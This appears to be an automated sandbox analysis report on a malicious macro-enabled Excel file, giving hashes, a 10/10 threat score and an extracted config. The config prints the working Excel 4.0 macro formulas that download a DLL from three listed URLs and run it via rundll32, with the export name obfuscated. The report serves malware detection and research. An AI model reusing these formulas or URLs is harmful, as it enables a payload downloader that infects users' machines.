General
-
Target
?i=1aexjgdkm
-
Size
83KB
-
Sample
220522-f55mkafha4
-
MD5
bdeba7feb925b8151d7f8df5271d7dbc
-
SHA1
4524ac7e23b673eb9ba92b304d20daf3b8453e51
-
SHA256
fc47084706c46ae94ca1c083194cef43af916b75afb8afef6f9fa59105067001
-
SHA512
80cdf16061091e9ce3760931239647a17fdd3483aa9276f1bb8e05399f308b4116e7e665100fd9c7fafacb1be87fb4dfb87b5576930dec29cca9208100750631
Behavioral task
behavioral1
Sample
?i=1aexjgdkm.xlsm
Resource
win7-20220414-en
Behavioral task
behavioral2
Sample
?i=1aexjgdkm.xlsm
Resource
win10v2004-20220414-en
Malware Config
Extracted
http://mail.emilyanncain.com/cgi-bin/A7NT3ENvn/
https://wordpress.baishuweb.com/wp-includes/10q0ice6/
http://monorailegypt.com/wp-admin/6uBf9CCfZRMh/
-
formulas
=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://mail.emilyanncain.com/cgi-bin/A7NT3ENvn/","..\erum.ocx",0,0) =IF('EWDFFEFAD'!E18<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://wordpress.baishuweb.com/wp-includes/10q0ice6/","..\erum.ocx",0,0)) =IF('EWDFFEFAD'!E20<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://monorailegypt.com/wp-admin/6uBf9CCfZRMh/","..\erum.ocx",0,0)) =IF('EWDFFEFAD'!E22<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\rundll32.exe ..\erum.ocx,D""&""l""&""lR""&""egister""&""Serve""&""r") =RETURN()
Extracted
http://mail.emilyanncain.com/cgi-bin/A7NT3ENvn/
Targets
-
-
Target
?i=1aexjgdkm
-
Size
83KB
-
MD5
bdeba7feb925b8151d7f8df5271d7dbc
-
SHA1
4524ac7e23b673eb9ba92b304d20daf3b8453e51
-
SHA256
fc47084706c46ae94ca1c083194cef43af916b75afb8afef6f9fa59105067001
-
SHA512
80cdf16061091e9ce3760931239647a17fdd3483aa9276f1bb8e05399f308b4116e7e665100fd9c7fafacb1be87fb4dfb87b5576930dec29cca9208100750631
Score10/10-
Process spawned unexpected child process
This typically indicates the parent process was compromised via an exploit or macro.
-